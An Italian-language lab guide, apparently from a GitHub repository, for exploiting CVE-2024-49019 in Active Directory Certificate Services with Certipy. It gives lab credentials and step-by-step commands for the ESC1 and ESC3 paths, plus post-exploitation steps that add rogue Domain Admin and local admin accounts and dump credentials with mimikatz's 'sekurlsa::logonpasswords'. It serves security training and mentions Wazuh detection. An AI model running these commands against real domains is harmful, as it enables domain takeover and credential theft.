
Sfruttamento per CVE-2024-49019
CVE-2024-49019 è una vulnerabilità nei Servizi Certificati di Active Directory (AD CS) che consente a un attaccante di aumentare i privilegi abusando dell'autenticazione basata su certificati. Questa guida mostra come sfruttare questa vulnerabilità utilizzando Certipy.
| Macchina Virtuale | Nome utente | Password |
|---|---|---|
| Windows Server 2022 | Administrator | !@windowsadmintest101 |
| Windows Server 2022 | testuser | $Vulnerable139 |
| Kali-VM | vagrant | vagrant |
| Ubuntu-Wazuh | wazuh | admin |
La macchina virtuale Ubuntu-Wazuh viene utilizzata per scopi di rilevamento. Guida al rilevamento Mitigazione
Per prima cosa, clonare il repository contenente i file necessari:
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng
È necessario installare Vagrant sulla macchina host prima di procedere.
Scaricare e installare Vagrant da qui, o installare usando PowerShell:
choco install vagrant
sudo apt update && sudo apt install vagrant -y
cd windows-server2022
vagrant up
cd kali-VM
vagrant up
cd WazuhUbuntu
vagrant up
Poiché l'exploit richiede una rete NAT, configurare VirtualBox come segue:
Prima di eseguire il comando sottostante, assicurarsi che VBoxManage sia aggiunto alle variabili d'ambiente. In caso contrario, eseguire il comando utilizzando il suo percorso completo:
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Se VBoxManage non viene riconosciuto, utilizzare:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Assicurarsi di controllare tutte le VM in VirtualBox e verificare che siano assegnate all'adattatore di rete NatNetwork - NatNet1. È possibile creare una rete NAT con un nome diverso, ma deve essere nel range IP 10.0.2.0/24.
Prima di procedere, assicurarsi che tutte le VM siano accese.
Accedere alla VM Kali Linux per avviare l'attacco e aggiornare il file /etc/hosts:
sudo nano /etc/hosts
Aggiungere la seguente voce:
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
Salvare e uscire.
Navigare nella directory CVE-49019 e attivare l'ambiente virtuale Python:
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate
Ci sono due modi per sfruttare questa vulnerabilità: ESC1 e ESC3.
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
add_user badadmin
add_user_to_group badadmin "Domain Admins"
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121
certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121
C'è una soluzione alternativa: assicurarsi che la macchina host abbia la stessa ora del server Windows stesso. Assicurarsi di eseguire questo comando per aggiornare la VM Kali-Linux in modo che sia uguale al server Windows.
sudo timedatectl set-ntp off
sudo rdate -n 10.0.2.121
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
Una volta ottenuto l'accesso a livello di amministratore, l'attaccante può:
net user hacked /add
net localgroup "Administrators" hacked /add
sekurlsa::logonpasswords
Per strategie di rilevamento e mitigazione, fare riferimento alla guida al rilevamento.
CVE-2024-49019 presenta un rischio di sicurezza significativo a causa della sua capacità di consentire l'escalation di privilegi non autorizzata. Comprendere questa vulnerabilità e implementare meccanismi di rilevamento adeguati, come l'uso di Wazuh, è fondamentale per proteggere gli ambienti Active Directory.
Per maggiori informazioni sulla sicurezza di AD CS, vedere Microsoft Security CVE-2024-49019.